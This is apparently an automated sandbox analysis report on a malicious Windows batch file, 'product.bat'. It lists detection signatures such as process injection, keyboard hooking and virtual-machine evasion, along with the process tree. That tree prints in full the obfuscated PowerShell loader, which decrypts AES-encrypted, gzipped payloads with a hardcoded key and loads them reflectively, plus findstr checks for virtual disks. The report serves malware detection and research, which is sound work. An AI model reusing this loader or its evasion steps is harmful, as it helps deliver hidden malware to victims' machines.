Edit tour
Windows
Analysis Report
product.bat
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 2268 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\produ ct.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7276 cmdline:
wmic diskd rive get M odel MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 7304 cmdline:
findstr /i /c:"QEMU HARDDISK" /c:"WDS100 T2B0A" /c: "DADY HARD DISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 7428 cmdline:
cmd.exe /c echo func tion vhVnA ($zVdEq){ $TQYfY=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $TQYfY. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $TQYfY. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ TQYfY.Key= [System.Co nvert]::Fr omBase64St ring('axHR lwLJv4pwkb Of9iAIJflO 6gLEZt+6bK Ch3RuytCA= '); $TQYfY .IV=[Syste m.Convert] ::FromBase 64String(' TxAvkYK6lZ IDMpmpV8o+ 4Q=='); $b qyNP=$TQYf Y.CreateDe cryptor(); $fZHAT=$b qyNP.Trans formFinalB lock($zVdE q, 0, $zVd Eq.Length) ; $bqyNP.D ispose(); $TQYfY.Dis pose(); $f ZHAT;}func tion FpYMp ($zVdEq){ Invoke-Exp ression '$ fEGds=New- Object *S* y*s*t*e*m* .*I*O*.M*e m*or*yS*tr *ea*m(,$zV dEq);'.Rep lace('*', ''); Invok e-Expressi on '$xpQRA =New-Objec t *S*y*s*t *e*m*.*I*O *.*M*e*m*o *r*y*S*t*r *e*a*m*;'. Replace('* ', ''); In voke-Expre ssion '$mC rfz=New-Ob ject S*y*s *t*e*m*.*I *O*.C*om*p r*e*ss*io* n.*GZ*ip*S t*re*am*($ fEGds, [IO .C*om*pr*e s*si*on*.C o*mp*re*ss *i*o*n*Mod e]::D*e*c* omp*re*ss) ;'.Replace ('*', ''); $mCrfz.Co pyTo($xpQR A); $mCrfz .Dispose() ; $fEGds.D ispose(); $xpQRA.Dis pose(); $x pQRA.ToArr ay();}func tion zHrKT ($zVdEq,$u lmvt){ Inv oke-Expres sion '$kTV mP=[*S*y*s *t*e*m*.*R *e*fl*ect* io*n.*As*s e*mb*l*y*] ::L*o*a*d* ([byte[]]$ zVdEq);'.R eplace('*' , ''); Inv oke-Expres sion '$aPG UN=$kTVmP. *E*n*t*r*y *P*o*i*n*t *;'.Replac e('*', '') ; Invoke-E xpression '$aPGUN.*I *n*v*o*k*e *($null, $ ulmvt);'.R eplace('*' , '');}$SQ OtV = 'C:\ Users\user \Desktop\p roduct.bat ';$host.UI .RawUI.Win dowTitle = $SQOtV;$K FKSq=[Syst em.IO.File ]::ReadAll Text($SQOt V).Split([ Environmen t]::NewLin e);foreach ($vmudF i n $KFKSq) { if ($vmu dF.StartsW ith('iecMs ')) { $hJZ kz=$vmudF. Substring( 5); break; }}$bRzqF= [string[]] $hJZkz.Spl it('\');In voke-Expre ssion '$ST i = FpYMp (vhVnA ([* C*o*n*v*e* r*t]::*F*r *o*m*B*a*s *e*6*4*S*t r*i*n*g($b RzqF[0].Re place("#", "/").Repl ace("@", " A"))));'.R eplace('*' , '');Invo ke-Express ion '$JnT = FpYMp (v hVnA ([*C* o*n*v*e*r* t]::*F*r*o *m*B*a*s*e *6*4*S*tr* i*n*g($bRz qF[1].Repl ace("#", " /").Replac e("@", "A" ))));'.Rep lace('*', '');Invoke -Expressio n '$UpD = FpYMp (vhV nA ([*C*o* n*v*e*r*t] ::*F*r*o*m *B*a*s*e*6 *4*S*tr*i* n*g($bRzqF [2].Replac e("#", "/" ).Replace( "@", "A")) ));'.Repla ce('*', '' );zHrKT $S Ti $null;z HrKT $JnT $null;zHrK T $UpD (,[ string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 7436 cmdline:
powershell .exe -Wind owStyle Hi dden MD5: 04029E121A0CFA5991749937DD22A1D9) - dllhost.exe (PID: 7680 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{372c91 16-8a11-42 07-941c-c8 3db9f8d8a2 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - winlogon.exe (PID: 556 cmdline:
winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - dllhost.exe (PID: 1660 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{29a282 51-c10b-42 e7-8393-a6 c218333ff2 } MD5: 08EB78E5BE019DF044C26B14703BD1FA) - svchost.exe (PID: 1752 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s AudioEndpo intBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1760 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s FontCa che MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1804 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s netpro fm MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - lsass.exe (PID: 632 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 2524 cmdline:
C:\Windows \system32\ svchost.ex e -k Netwo rkService -p -s Cryp tSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 912 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 976 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 356 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 704 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 932 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1044 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1064 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1080 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1188 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1212 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1344 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1376 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s DispBr okerDeskto pSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1388 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s EventS ystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1400 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1436 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s T hemes MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1520 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1636 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S ENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1668 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p -s NlaS vc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - cmd.exe (PID: 7764 cmdline:
"C:\Window s\System32 \cmd.exe" /C type C: \Users\use r\Desktop\ product.ba t>C:\Windo ws\$rbx-on imai2\$rbx -CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7896 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Wind ows\$rbx-o nimai2\$rb x-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7916 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 7972 cmdline:
wmic diskd rive get M odel MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - findstr.exe (PID: 7988 cmdline:
findstr /i /c:"QEMU HARDDISK" /c:"WDS100 T2B0A" /c: "DADY HARD DISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 8156 cmdline:
cmd.exe /c echo func tion vhVnA ($zVdEq){ $TQYfY=[Sy stem.Secur ity.Crypto graphy.Aes ]::Create( ); $TQYfY. Mode=[Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::CB C; $TQYfY. Padding=[S ystem.Secu rity.Crypt ography.Pa ddingMode] ::PKCS7; $ TQYfY.Key= [System.Co nvert]::Fr omBase64St ring('axHR lwLJv4pwkb Of9iAIJflO 6gLEZt+6bK Ch3RuytCA= '); $TQYfY .IV=[Syste m.Convert] ::FromBase 64String(' TxAvkYK6lZ IDMpmpV8o+ 4Q=='); $b qyNP=$TQYf Y.CreateDe cryptor(); $fZHAT=$b qyNP.Trans formFinalB lock($zVdE q, 0, $zVd Eq.Length) ; $bqyNP.D ispose(); $TQYfY.Dis pose(); $f ZHAT;}func tion FpYMp ($zVdEq){ Invoke-Exp ression '$ fEGds=New- Object *S* y*s*t*e*m* .*I*O*.M*e m*or*yS*tr *ea*m(,$zV dEq);'.Rep lace('*', ''); Invok e-Expressi on '$xpQRA =New-Objec t *S*y*s*t *e*m*.*I*O *.*M*e*m*o *r*y*S*t*r *e*a*m*;'. Replace('* ', ''); In voke-Expre ssion '$mC rfz=New-Ob ject S*y*s *t*e*m*.*I *O*.C*om*p r*e*ss*io* n.*GZ*ip*S t*re*am*($ fEGds, [IO .C*om*pr*e s*si*on*.C o*mp*re*ss *i*o*n*Mod e]::D*e*c* omp*re*ss) ;'.Replace ('*', ''); $mCrfz.Co pyTo($xpQR A); $mCrfz .Dispose() ; $fEGds.D ispose(); $xpQRA.Dis pose(); $x pQRA.ToArr ay();}func tion zHrKT ($zVdEq,$u lmvt){ Inv oke-Expres sion '$kTV mP=[*S*y*s *t*e*m*.*R *e*fl*ect* io*n.*As*s e*mb*l*y*] ::L*o*a*d* ([byte[]]$ zVdEq);'.R eplace('*' , ''); Inv oke-Expres sion '$aPG UN=$kTVmP. *E*n*t*r*y *P*o*i*n*t *;'.Replac e('*', '') ; Invoke-E xpression '$aPGUN.*I *n*v*o*k*e *($null, $ ulmvt);'.R eplace('*' , '');}$SQ OtV = 'C:\ Windows\$r bx-onimai2 \$rbx-CO2. bat';$host .UI.RawUI. WindowTitl e = $SQOtV ;$KFKSq=[S ystem.IO.F ile]::Read AllText($S QOtV).Spli t([Environ ment]::New Line);fore ach ($vmud F in $KFKS q) { if ($ vmudF.Star tsWith('ie cMs')) { $ hJZkz=$vmu dF.Substri ng(5); bre ak; }}$bRz qF=[string []]$hJZkz. Split('\') ;Invoke-Ex pression ' $STi = FpY Mp (vhVnA ([*C*o*n*v *e*r*t]::* F*r*o*m*B* a*s*e*6*4* S*tr*i*n*g ($bRzqF[0] .Replace(" #", "/").R eplace("@" , "A")))); '.Replace( '*', '');I nvoke-Expr ession '$J nT = FpYMp (vhVnA ([ *C*o*n*v*e *r*t]::*F* r*o*m*B*a* s*e*6*4*S* tr*i*n*g($ bRzqF[1].R eplace("#" , "/").Rep lace("@", "A"))));'. Replace('* ', '');Inv oke-Expres sion '$UpD = FpYMp ( vhVnA ([*C *o*n*v*e*r *t]::*F*r* o*m*B*a*s* e*6*4*S*tr *i*n*g($bR zqF[2].Rep lace("#", "/").Repla ce("@", "A "))));'.Re place('*', '');zHrKT $STi $nul l;zHrKT $J nT $null;z HrKT $UpD (,[string[ ]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 8164 cmdline:
powershell .exe -Wind owStyle Hi dden MD5: 04029E121A0CFA5991749937DD22A1D9) - schtasks.exe (PID: 1624 cmdline:
"C:\Window s\System32 \schtasks. exe" /Dele te /TN "$r bx-CNT1" / F MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 1504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |